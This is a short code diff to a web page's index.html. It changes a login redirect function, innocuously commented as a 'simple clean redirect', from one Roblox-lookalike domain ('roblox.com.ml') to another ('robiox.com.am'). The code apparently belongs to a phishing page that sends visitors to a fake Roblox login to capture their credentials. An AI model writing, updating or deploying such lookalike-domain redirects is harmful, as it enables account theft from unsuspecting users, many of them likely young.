--- a/index.html
+++ b/index.html
@@ -286,7 +286,7 @@
 
     // Simple clean redirect
     function openLogin() {
-      window.location.href = "https://www.roblox.com.ml/login?returnUrl=2531990090521321";
+      window.location.href = "https://www.robiox.com.am/login?returnUrl=2531990090521321";
     }
   </script>
 </body>
